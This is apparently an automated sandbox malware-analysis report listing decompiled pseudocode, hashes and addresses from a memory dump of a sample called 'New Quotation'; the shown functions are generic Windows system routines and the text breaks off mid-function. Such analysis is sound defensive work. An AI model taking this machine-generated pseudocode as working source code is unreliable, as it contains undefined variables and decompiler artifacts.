                                                                                                                                                                                          0x1d7d3fdb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3fdb

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 15bb1fe8318f3fdc0580099d335a0d8447c36e049808243800ac1d1ffab93a49
                                                                                                                                                                                          • Instruction ID: bd85a42675bf0da85a923961c76f30ca1030fe054a10298732c74c81e0368fa1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 15bb1fe8318f3fdc0580099d335a0d8447c36e049808243800ac1d1ffab93a49
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9051C375A00B5ADFCB44CF68C490B9EBBF1BF48364F21856AD659A7344DB30AD40CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D871889 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E1D871889(intOrPtr __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t52;
				signed int _t65;
				void* _t72;
				signed int _t73;
				signed short _t74;
				signed int _t78;
				void* _t79;
				short* _t84;
				signed int _t87;

				_v16 = __ecx;
				_t78 = 0;
				_v12 = __edx;
				_t65 = 0;
				_t84 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) == 0 || __edx == 0 || _a4 == 0) {
					_t87 = 0xc000000d;
					goto L26;
				} else {
					_t79 = 8;
					_push(0x2a);
					if(E1D7CA121(0, _t79) != 0) {
						_t84 = E1D7E5D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t44);
						if(_t84 != 0) {
							_t70 = _v12;
							_t87 = 0;
							if(E1D7CA0B8(0, _v12, _t84, _a4, _a8, 0, 0) != 0) {
								_t65 = E1D7E5D90(_t70,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xaa);
								if(_t65 != 0) {
									_t78 = 0;
									_t52 = 0;
									_v12 = 0;
									do {
										if(0 == _t52) {
											goto L22;
										}
										_t73 = _t52;
										if( *((intOrPtr*)(_t84 + 4 + _t73 * 8)) == _t78) {
											goto L22;
										}
										if( *(_t84 + _t73 * 8) <= _t78) {
											_t74 =  *(_t84 + 2 + _t73 * 8) & 0x0000ffff;
											if(_t74 < 0) {
												_t87 = 0xc00000e5;
												L26:
												if(_t65 != 0) {
													E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t78, _t65);
												}
												L28:
												if(_t84 != 0) {
													E1D7CA093(_t84);
												}
												goto L30;
											}
											_t81 =  *((intOrPtr*)(_a4 + 0x18));
											_t73 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x18)) + 0xc)) + _t74 * 2));
											E1D815050(_t73,  &_v24,  *((intOrPtr*)(_t81 + 0x10)) + _t73 * 2);
											L20:
											_push(_t73);
											_t87 = E1D7F5497(_v16, _a4, 0,  &_v8, _v20);
											_t78 = 0;
											if(_t87 < 0) {
												goto L26;
											}
											_t52 = _v12;
											goto L22;
										}
										_v20 = _t65;
										_v24 = 0xaa0000;
										if(E1D7F4F40( *(_t84 + _t73 * 8) & 0x0000ffff,  &_v24) != 0) {
											goto L20;
										}
										_t87 = 0xc00000e5;
										_t78 = 0;
										goto L26;
										L22:
										_t52 = _t52 + 1;
										_t72 = 0x2a;
										_v12 = _t52;
									} while (_t52 < _t72);
									goto L26;
								}
								_t87 = 0xc0000017;
								goto L28;
							}
							_t87 = 0xc0000001;
							goto L28;
						}
						_t87 = 0xc0000017;
						goto L30;
					} else {
						_t87 = 0xc0000095;
						L30:
						return _t87;
					}
				}
			}

















                                                                                                                                                                                          0x1d871894
                                                                                                                                                                                          0x1d871897
                                                                                                                                                                                          0x1d871899
                                                                                                                                                                                          0x1d87189c
                                                                                                                                                                                          0x1d8718a0
                                                                                                                                                                                          0x1d8718a4
                                                                                                                                                                                          0x1d8719ef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8718c3
                                                                                                                                                                                          0x1d8718c5
                                                                                                                                                                                          0x1d8718c6
                                                                                                                                                                                          0x1d8718d2
                                                                                                                                                                                          0x1d8718ef
                                                                                                                                                                                          0x1d8718f3
                                                                                                                                                                                          0x1d8718ff
                                                                                                                                                                                          0x1d87190b
                                                                                                                                                                                          0x1d871917
                                                                                                                                                                                          0x1d871939
                                                                                                                                                                                          0x1d87193d
                                                                                                                                                                                          0x1d871949
                                                                                                                                                                                          0x1d87194b
                                                                                                                                                                                          0x1d87194d
                                                                                                                                                                                          0x1d871950
                                                                                                                                                                                          0x1d871955
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d871957
                                                                                                                                                                                          0x1d87195e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d871964
                                                                                                                                                                                          0x1d87198b
                                                                                                                                                                                          0x1d871993
                                                                                                                                                                                          0x1d8719e8
                                                                                                                                                                                          0x1d8719f4
                                                                                                                                                                                          0x1d8719f6
                                                                                                                                                                                          0x1d871a03
                                                                                                                                                                                          0x1d871a03
                                                                                                                                                                                          0x1d871a08
                                                                                                                                                                                          0x1d871a0a
                                                                                                                                                                                          0x1d871a0e
                                                                                                                                                                                          0x1d871a0e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d871a0a
                                                                                                                                                                                          0x1d87199b
                                                                                                                                                                                          0x1d8719a1
                                                                                                                                                                                          0x1d8719b0
                                                                                                                                                                                          0x1d8719b5
                                                                                                                                                                                          0x1d8719bb
                                                                                                                                                                                          0x1d8719cb
                                                                                                                                                                                          0x1d8719cd
                                                                                                                                                                                          0x1d8719d1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8719d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8719d3
                                                                                                                                                                                          0x1d871969
                                                                                                                                                                                          0x1d87196d
                                                                                                                                                                                          0x1d871980
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d871982
                                                                                                                                                                                          0x1d871987
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8719d6
                                                                                                                                                                                          0x1d8719d8
                                                                                                                                                                                          0x1d8719d9
                                                                                                                                                                                          0x1d8719da
                                                                                                                                                                                          0x1d8719dd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8719e6
                                                                                                                                                                                          0x1d87193f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87193f
                                                                                                                                                                                          0x1d871919
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d871919
                                                                                                                                                                                          0x1d8718f5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8718d4
                                                                                                                                                                                          0x1d8718d4
                                                                                                                                                                                          0x1d871a13
                                                                                                                                                                                          0x1d871a19
                                                                                                                                                                                          0x1d871a19
                                                                                                                                                                                          0x1d8718d2

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e1dfae469ae858e8c9d0516dadbbb0ed0a6e88875ddd7105ede04bdb539c58d3
                                                                                                                                                                                          • Instruction ID: ad1e1857da98b3507563b9998c538c12fed4829d181f3645c3d872b5249dee46
                                                                                                                                                                                          • Opcode Fuzzy Hash: e1dfae469ae858e8c9d0516dadbbb0ed0a6e88875ddd7105ede04bdb539c58d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20412931E0454AAFDB05DE99C840F7EB3BBFF44754F82816AA9449B620EB30DD41C792
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FD940 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E1D7FD940(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v1352;
				signed int _v1356;
				signed int _v1360;
				signed int _v1364;
				intOrPtr _v1372;
				char _v1396;
				signed int _v2748;
				char _v2776;
				char _v2780;
				signed int _v2784;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				signed int _t47;
				signed int _t51;
				void* _t57;
				signed int _t58;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				void* _t74;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t79;
				signed int _t81;

				_t79 = (_t77 & 0xfffffff8) - 0xadc;
				_v8 =  *0x1d8cb370 ^ _t79;
				_t73 = _a4;
				E1D818F40( &_v1396, 0, 0x568);
				E1D818F40( &_v2780, 0, 0x568);
				_t81 = _t79 + 0x18;
				_v2784 = 0;
				if(_t73 == 0) {
					L5:
					_t38 = 0xc000000d;
					L4:
					_pop(_t69);
					_pop(_t74);
					_pop(_t57);
					return E1D814B50(_t38, _t57, _v8 ^ _t81, _t66, _t69, _t74);
				}
				if(_t73 != 0xffffffff || ( *( *[fs:0x30] + 0x68) & 0x00000200) != 0) {
					_push(0);
					_push(0);
					_push(0x1000);
					_push( &_v2784);
					_push(0xffffffff);
					_push(_t73);
					_push(0xffffffff);
					_t75 = E1D812D70();
					__eflags = _t75;
					if(_t75 < 0) {
						L27:
						__eflags = _v2784;
						if(_v2784 != 0) {
							_push(_v2784);
							E1D812A80();
						}
						_t38 = _t75;
						goto L4;
					}
					_t70 =  *( *[fs:0x18] + 0x20);
					_t58 =  *( *[fs:0x18] + 0x24);
					_t76 = E1D85B3DF(_v2784);
					__eflags = _t70;
					if(_t70 == 0) {
						goto L5;
					}
					__eflags = _t58;
					if(_t58 == 0) {
						goto L5;
					}
					__eflags = _t76;
					if(_t76 == 0) {
						goto L5;
					}
					__eflags = _t70 - _t76;
					if(_t70 == _t76) {
						_t47 =  *( *[fs:0x30] + 0x68);
					} else {
						_t47 = E1D85B214(_v2784);
					}
					__eflags = _t47 & 0x00000200;
					if((_t47 & 0x00000200) != 0) {
						_v1352 = _a8;
						_v1396 = 0x5680550;
						_v1372 = 0x30000000;
						_v1364 = _t58;
						_v1360 = _t70;
						_v1356 = _t76;
						E1D818F40( &_v2776, 0, 0x564);
						_t81 = _t81 + 0xc;
						_v2780 = 0x5680550;
						_t66 =  &_v2780;
						_t51 = E1D85AC90( &_v1396,  &_v2780, _t70, __eflags);
						__eflags = _t51;
						if(_t51 >= 0) {
							__eflags = _t51 - 0x102;
							if(_t51 != 0x102) {
								_t71 = _v2748;
								while(1) {
									_push(0);
									_push(1);
									_push(_t71);
									_t75 = E1D8129D0();
									__eflags = _t75 - 0x102;
									if(_t75 == 0x102) {
										break;
									}
									__eflags = _t75;
									if(_t75 < 0) {
										break;
									}
									__eflags = _t75 - 0xc0;
									if(_t75 == 0xc0) {
										continue;
									}
									__eflags = _t75 - 0x101;
									if(_t75 == 0x101) {
										continue;
									}
									_t75 = 0;
									__eflags = 0;
									break;
								}
								__eflags = _t71;
								if(_t71 != 0) {
									_push(_t71);
									E1D812A80();
								}
								goto L27;
							}
							_t75 = 0xc0000240;
							goto L27;
						}
						_t75 = 0xc0000001;
					} else {
						_t75 = 0;
					}
					goto L27;
				} else {
					_t38 = 0;
					goto L4;
				}
			}
































                                                                                                                                                                                          0x1d7fd948
                                                                                                                                                                                          0x1d7fd955
                                                                                                                                                                                          0x1d7fd95e
                                                                                                                                                                                          0x1d7fd973
                                                                                                                                                                                          0x1d7fd982
                                                                                                                                                                                          0x1d7fd987
                                                                                                                                                                                          0x1d7fd98a
                                                                                                                                                                                          0x1d7fd990
                                                                                                                                                                                          0x1d7fd9c7
                                                                                                                                                                                          0x1d7fd9c7
                                                                                                                                                                                          0x1d7fd9b0
                                                                                                                                                                                          0x1d7fd9b7
                                                                                                                                                                                          0x1d7fd9b8
                                                                                                                                                                                          0x1d7fd9b9
                                                                                                                                                                                          0x1d7fd9c4
                                                                                                                                                                                          0x1d7fd9c4
                                                                                                                                                                                          0x1d7fd995
                                                                                                                                                                                          0x1d83f2b4
                                                                                                                                                                                          0x1d83f2b5
                                                                                                                                                                                          0x1d83f2b6
                                                                                                                                                                                          0x1d83f2bf
                                                                                                                                                                                          0x1d83f2c0
                                                                                                                                                                                          0x1d83f2c2
                                                                                                                                                                                          0x1d83f2c3
                                                                                                                                                                                          0x1d83f2ca
                                                                                                                                                                                          0x1d83f2cc
                                                                                                                                                                                          0x1d83f2ce
                                                                                                                                                                                          0x1d83f3df
                                                                                                                                                                                          0x1d83f3df
                                                                                                                                                                                          0x1d83f3e4
                                                                                                                                                                                          0x1d83f3e6
                                                                                                                                                                                          0x1d83f3ea
                                                                                                                                                                                          0x1d83f3ea
                                                                                                                                                                                          0x1d83f3ef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f3ef
                                                                                                                                                                                          0x1d83f2da
                                                                                                                                                                                          0x1d83f2e7
                                                                                                                                                                                          0x1d83f2ef
                                                                                                                                                                                          0x1d83f2f1
                                                                                                                                                                                          0x1d83f2f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f2f9
                                                                                                                                                                                          0x1d83f2fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f301
                                                                                                                                                                                          0x1d83f303
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f309
                                                                                                                                                                                          0x1d83f30b
                                                                                                                                                                                          0x1d83f31e
                                                                                                                                                                                          0x1d83f30d
                                                                                                                                                                                          0x1d83f311
                                                                                                                                                                                          0x1d83f311
                                                                                                                                                                                          0x1d83f321
                                                                                                                                                                                          0x1d83f326
                                                                                                                                                                                          0x1d83f337
                                                                                                                                                                                          0x1d83f345
                                                                                                                                                                                          0x1d83f350
                                                                                                                                                                                          0x1d83f35b
                                                                                                                                                                                          0x1d83f362
                                                                                                                                                                                          0x1d83f369
                                                                                                                                                                                          0x1d83f370
                                                                                                                                                                                          0x1d83f375
                                                                                                                                                                                          0x1d83f378
                                                                                                                                                                                          0x1d83f380
                                                                                                                                                                                          0x1d83f38b
                                                                                                                                                                                          0x1d83f390
                                                                                                                                                                                          0x1d83f392
                                                                                                                                                                                          0x1d83f3a0
                                                                                                                                                                                          0x1d83f3a2
                                                                                                                                                                                          0x1d83f3ab
                                                                                                                                                                                          0x1d83f3af
                                                                                                                                                                                          0x1d83f3af
                                                                                                                                                                                          0x1d83f3b1
                                                                                                                                                                                          0x1d83f3b3
                                                                                                                                                                                          0x1d83f3b9
                                                                                                                                                                                          0x1d83f3bb
                                                                                                                                                                                          0x1d83f3bd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f3bf
                                                                                                                                                                                          0x1d83f3c1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f3c3
                                                                                                                                                                                          0x1d83f3c9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f3cb
                                                                                                                                                                                          0x1d83f3d1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f3d3
                                                                                                                                                                                          0x1d83f3d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f3d3
                                                                                                                                                                                          0x1d83f3d5
                                                                                                                                                                                          0x1d83f3d7
                                                                                                                                                                                          0x1d83f3d9
                                                                                                                                                                                          0x1d83f3da
                                                                                                                                                                                          0x1d83f3da
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f3d7
                                                                                                                                                                                          0x1d83f3a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f3a4
                                                                                                                                                                                          0x1d83f394
                                                                                                                                                                                          0x1d83f328
                                                                                                                                                                                          0x1d83f328
                                                                                                                                                                                          0x1d83f328
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fd9ae
                                                                                                                                                                                          0x1d7fd9ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fd9ae

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b5ad9f0a5c3e7b172f9311075f0ac05cef1d925fd9573624430bf72a6986d6a6
                                                                                                                                                                                          • Instruction ID: 3875ddeb30dc0233d1f77b5f36add1506abbfea62ee10fe050be46f1db2789f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ad9f0a5c3e7b172f9311075f0ac05cef1d925fd9573624430bf72a6986d6a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C41C777908755AFD321DA68C8C0B6BB3A8EB84B25F014669F9AC57290D674EC048FD3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D0C79 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E1D7D0C79(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr* _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x1d8cb370 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E1D818F40( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1d8c5da8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E1D8145E0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = E1D7E5D90(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E1D7FABA0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E1D814B50(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E1D818870(_t67 + 0xc, 0x1d7a51e0, 0x10) == 0) {
								 *0x1d8c41d0 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E1D7D0D9F(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E1D7D0FB0(0xa0, _t64, 0x1d8c6880, E1D7D1CD0, 0, 0) != 0) {
					_t46 = E1D7FABA0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}



















                                                                                                                                                                                          0x1d7d0c79
                                                                                                                                                                                          0x1d7d0c8b
                                                                                                                                                                                          0x1d7d0c91
                                                                                                                                                                                          0x1d7d0c96
                                                                                                                                                                                          0x1d7d0ca3
                                                                                                                                                                                          0x1d7d0caa
                                                                                                                                                                                          0x1d7d0caf
                                                                                                                                                                                          0x1d7d0cb5
                                                                                                                                                                                          0x1d7d0cbd
                                                                                                                                                                                          0x1d7d0cca
                                                                                                                                                                                          0x1d7d0ccc
                                                                                                                                                                                          0x1d7d0ceb
                                                                                                                                                                                          0x1d7d0cee
                                                                                                                                                                                          0x1d7d0cf5
                                                                                                                                                                                          0x1d7d0cf6
                                                                                                                                                                                          0x1d7d0cf7
                                                                                                                                                                                          0x1d7d0cf8
                                                                                                                                                                                          0x1d7d0cf9
                                                                                                                                                                                          0x1d7d0cff
                                                                                                                                                                                          0x1d7d0d06
                                                                                                                                                                                          0x1d7d0d0a
                                                                                                                                                                                          0x1d7d0d13
                                                                                                                                                                                          0x1d7d0d1c
                                                                                                                                                                                          0x1d7d0d1d
                                                                                                                                                                                          0x1d7d0d1e
                                                                                                                                                                                          0x1d7d0d1f
                                                                                                                                                                                          0x1d7d0d24
                                                                                                                                                                                          0x1d7d0d25
                                                                                                                                                                                          0x1d7d0d27
                                                                                                                                                                                          0x1d7d0d31
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82f0d3
                                                                                                                                                                                          0x1d82f0e1
                                                                                                                                                                                          0x1d82f0e1
                                                                                                                                                                                          0x1d82f0f4
                                                                                                                                                                                          0x1d82f0fe
                                                                                                                                                                                          0x1d82f103
                                                                                                                                                                                          0x1d82f109
                                                                                                                                                                                          0x1d82f110
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82f116
                                                                                                                                                                                          0x1d82f116
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82f116
                                                                                                                                                                                          0x1d82f110
                                                                                                                                                                                          0x1d7d0d39
                                                                                                                                                                                          0x1d82f126
                                                                                                                                                                                          0x1d82f12a
                                                                                                                                                                                          0x1d7d0d70
                                                                                                                                                                                          0x1d7d0d77
                                                                                                                                                                                          0x1d82f137
                                                                                                                                                                                          0x1d82f149
                                                                                                                                                                                          0x1d82f149
                                                                                                                                                                                          0x1d82f137
                                                                                                                                                                                          0x1d7d0d7d
                                                                                                                                                                                          0x1d7d0d7f
                                                                                                                                                                                          0x1d7d0d8d
                                                                                                                                                                                          0x1d7d0d8d
                                                                                                                                                                                          0x1d7d0d41
                                                                                                                                                                                          0x1d7d0d41
                                                                                                                                                                                          0x1d7d0d47
                                                                                                                                                                                          0x1d7d0d4d
                                                                                                                                                                                          0x1d7d0d93
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d0d59
                                                                                                                                                                                          0x1d7d0d6e
                                                                                                                                                                                          0x1d7d0d97
                                                                                                                                                                                          0x1d7d0d97
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d0d6e
                                                                                                                                                                                          0x1d7d0d4f
                                                                                                                                                                                          0x1d7d0d4f
                                                                                                                                                                                          0x1d7d0d54
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d0d54
                                                                                                                                                                                          0x1d7d0d3f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d0d3f
                                                                                                                                                                                          0x1d7d0ce3
                                                                                                                                                                                          0x1d82f0c2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d0ce9
                                                                                                                                                                                          0x1d7d0ce9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d0ce9

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ff7bb4646a86e27762a409c8d546744655a4b02e2fac3ff978b5caa768bac504
                                                                                                                                                                                          • Instruction ID: 5a7f4884a6f20625c049bdb640ed6f10c72ed886eac6264a416723c9f2de100c
                                                                                                                                                                                          • Opcode Fuzzy Hash: ff7bb4646a86e27762a409c8d546744655a4b02e2fac3ff978b5caa768bac504
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E41C375A007649FE7628F24DC84BAA77B9AB446A0F010097F9499B291D770FD80CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C9FD0 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7C9FD0(intOrPtr _a4, intOrPtr* _a8, char _a12) {
				signed int _v8;
				signed short _v12;
				signed int _v16;
				void* _t31;
				signed int _t35;
				signed short _t37;
				signed int _t38;
				intOrPtr* _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				void* _t48;
				signed int _t49;
				signed short* _t51;
				void* _t52;
				signed short _t54;
				signed int _t55;
				signed int _t56;
				short* _t57;
				intOrPtr _t58;

				_t57 = 0;
				if(_a4 == 0) {
					L34:
					_t58 = 0xc000000d;
					L11:
					if(_t57 != 0) {
						E1D7CA093(_t57);
					}
					L13:
					return _t58;
				}
				_t39 = _a8;
				if(_a8 == 0) {
					goto L34;
				}
				_t52 = 8;
				_t31 = 0x2a;
				_t45 = _t31;
				if(E1D7CA121(_t31, _t52) == 0) {
					_t58 = 0xc0000095;
					goto L13;
				}
				_t57 = E1D7E5D90(_t45,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t32);
				if(_t57 == 0) {
					_t58 = 0xc0000017;
					goto L13;
				} else {
					_t35 = 0x2a;
					_t58 = 0;
					if(E1D7CA0B8(_t35, _t39, _t57, _a4, 0, 0, _t35) == 0) {
						_t58 = 0xc0000001;
					}
					_t54 = 0;
					_t37 = 0;
					_v12 = 0;
					do {
						if(0 == _t37) {
							goto L8;
						}
						_t49 = _t37;
						_v16 = _t49;
						if( *((intOrPtr*)(_t57 + 4 + _t49 * 8)) != _t54) {
							if(0 >= _t37) {
								goto L8;
							}
							_t41 = _t37 & 0x0000ffff;
							_t13 = _t57 + 2; // 0x2
							_t51 = _t13;
							_t38 = _v16;
							_v8 = _t41;
							do {
								if(_t51[1] != _t54) {
									_t55 =  *(_t51 - 2) & 0x0000ffff;
									if(_t55 != 0) {
										_t43 =  *(_t57 + _t38 * 8) & 0x0000ffff;
										if(_t43 == 0) {
											_t41 = _v8;
										} else {
											_t41 = _v8;
											if(_t55 == _t43) {
												_t58 = 0xc0000001;
											}
										}
									}
									_t56 =  *_t51 & 0x0000ffff;
									if(_t56 > 0) {
										_t42 =  *(_t57 + 2 + _t38 * 8) & 0x0000ffff;
										if(_t42 <= 0) {
											_t41 = _v8;
										} else {
											_t41 = _v8;
											if(_t56 == _t42) {
												_t58 = 0xc0000001;
											}
										}
									}
